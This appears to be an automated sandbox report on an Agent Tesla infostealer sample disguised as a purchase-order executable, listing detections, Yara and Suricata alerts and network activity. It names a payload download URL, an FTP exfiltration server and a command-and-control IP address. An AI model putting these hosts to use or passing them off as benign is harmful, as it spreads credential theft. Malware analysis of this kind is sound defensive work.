Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Virustotal: Detection: 31%			Perma Link

Multi AV Scanner detection for submitted file

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	ReversingLabs: Detection: 31%
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Virustotal: Detection: 31%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Iujcy.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Joe Sandbox ML: detected

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.7:49775 version: TLS 1.2

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1316499062.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1544555962.00000000037B8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1316499062.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1544555962.00000000037B8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_057D0260
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_057D0255
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_05AFFDF8
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05AF3AEEh	0_2_05AF3C8D
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_05AFFE00
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05AFB708h	0_2_05AFB648
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05AFB708h	0_2_05AFB650
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05AF3400h	0_2_05AF3380
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05AF3400h	0_2_05AF3370
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05AF3AEEh	0_2_05AF3A88
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05AF3AEEh	0_2_05AF3A7B
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05B00D0Ah	0_2_05B00CA0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05B00D0Ah	0_2_05B00C92
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05B00D0Ah	0_2_05B00FBC
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 4x nop then jmp 05B00D0Ah	0_2_05B00E5D
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	10_2_05E70260
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	10_2_05E70255
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	10_2_0619FE00
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 0619B708h	10_2_0619B650
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 0619B708h	10_2_0619B648
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 06193AEEh	10_2_06193C8D
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	10_2_0619FDF8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 06193AEEh	10_2_06193A7A
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 06193AEEh	10_2_06193A88
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 06193400h	10_2_06193370
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 06193400h	10_2_06193380
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 061A0D0Ah	10_2_061A0E65
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 061A0D0Ah	10_2_061A0C92
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 061A0D0Ah	10_2_061A0CA0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	13_2_05D7035D
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	13_2_05D70368
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F53AF6h	13_2_05F53C95
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F53000h	13_2_05F52F80
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F53000h	13_2_05F52F70
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F5B708h	13_2_05F5B650
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F5B708h	13_2_05F5B648
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	13_2_05F5FE00
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	13_2_05F5FE08
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F53AF6h	13_2_05F53A90
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F53AF6h	13_2_05F53A83
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F60D0Ah	13_2_05F60CA0
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F60D0Ah	13_2_05F60C91
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 4x nop then jmp 05F60D0Ah	13_2_05F60E65

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.7:49701 -> 5.2.84.236:52560
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.7:49700 -> 5.2.84.236:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.7:49760 -> 5.2.84.236:53494
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.7:49740 -> 5.2.84.236:21
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.7:49796 -> 5.2.84.236:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.7:49812 -> 5.2.84.236:51014

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 5.2.84.236 ports 52560,1,2,53494,51014,21

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.7:49701 -> 5.2.84.236:52560

Source: global traffic	HTTP traffic detected: GET /ozeli/Xibknlpkg.vdf HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ozeli/Xibknlpkg.vdf HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ozeli/Xibknlpkg.vdf HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ozeli/Xibknlpkg.vdf HTTP/1.1Host: wymascensores.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 67.212.175.162 67.212.175.162
Source: Joe Sandbox View	IP Address: 5.2.84.236 5.2.84.236

Source: Joe Sandbox View

ASN Name: ALASTYRTR ALASTYRTR

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

FTP traffic detected: 5.2.84.236:21 -> 192.168.2.7:49700 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:41. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ozeli/Xibknlpkg.vdf HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ozeli/Xibknlpkg.vdf HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ozeli/Xibknlpkg.vdf HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ozeli/Xibknlpkg.vdf HTTP/1.1Host: wymascensores.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: wymascensores.com
Source: global traffic	DNS traffic detected: DNS query: ftp.alternatifplastik.com

Source: InstallUtil.exe, 00000008.00000002.1413730064.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1413730064.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.1516278275.000000000315E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.1516278275.000000000316C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2503048867.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2503048867.000000000300C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.alternatifplastik.com
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1413730064.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.1516278275.000000000315E000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2503048867.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025E7000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: Iujcy.exe, 0000000D.00000002.1548837966.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wdcp.micros
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wymascensores.com
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wymascensores.com/ozeli/Xibknlpkg.vdf
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, Iujcy.exe.0.dr	String found in binary or memory: https://wymascensores.com/ozeli/Xibknlpkg.vdf18p6Mu3xADDSL

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769

Source: unknown	HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.7:49775 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.Iujcy.exe.3910328.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 13.2.Iujcy.exe.3910328.3.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 10.2.Iujcy.exe.3ee4480.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.Iujcy.exe.3ee4480.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 13.2.Iujcy.exe.3910328.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 13.2.Iujcy.exe.3910328.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 10.2.Iujcy.exe.3ee4480.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.Iujcy.exe.3ee4480.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AFE408 NtResumeThread,	0_2_05AFE408
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AFCF18 NtProtectVirtualMemory,	0_2_05AFCF18
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AFE400 NtResumeThread,	0_2_05AFE400
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0619CF18 NtProtectVirtualMemory,	10_2_0619CF18
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0619E408 NtResumeThread,	10_2_0619E408
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0619E400 NtResumeThread,	10_2_0619E400
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F5E410 NtResumeThread,	13_2_05F5E410
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F5CB18 NtProtectVirtualMemory,	13_2_05F5CB18
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F5E408 NtResumeThread,	13_2_05F5E408

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_00D22090	0_2_00D22090
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_00D220A0	0_2_00D220A0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_00D226F0	0_2_00D226F0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_057D75C0	0_2_057D75C0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_057D4EE0	0_2_057D4EE0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_057D89BC	0_2_057D89BC
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_057DA530	0_2_057DA530
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_057DD5D0	0_2_057DD5D0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_057D1798	0_2_057D1798
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_057D1788	0_2_057D1788
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05843D90	0_2_05843D90
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_0584C0A8	0_2_0584C0A8
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05843D81	0_2_05843D81
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_0584C0A1	0_2_0584C0A1
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_058420E8	0_2_058420E8
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_058420F8	0_2_058420F8
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05844332	0_2_05844332
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_0584CB71	0_2_0584CB71
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF9DF8	0_2_05AF9DF8
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF5AF0	0_2_05AF5AF0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF9DE9	0_2_05AF9DE9
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AFBC80	0_2_05AFBC80
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AFCC80	0_2_05AFCC80
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF3F00	0_2_05AF3F00
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF3F10	0_2_05AF3F10
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF7028	0_2_05AF7028
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF7038	0_2_05AF7038
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF0040	0_2_05AF0040
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AF5AE0	0_2_05AF5AE0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05B094A0	0_2_05B094A0
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05B09490	0_2_05B09490
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05B10040	0_2_05B10040
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05B13A90	0_2_05B13A90
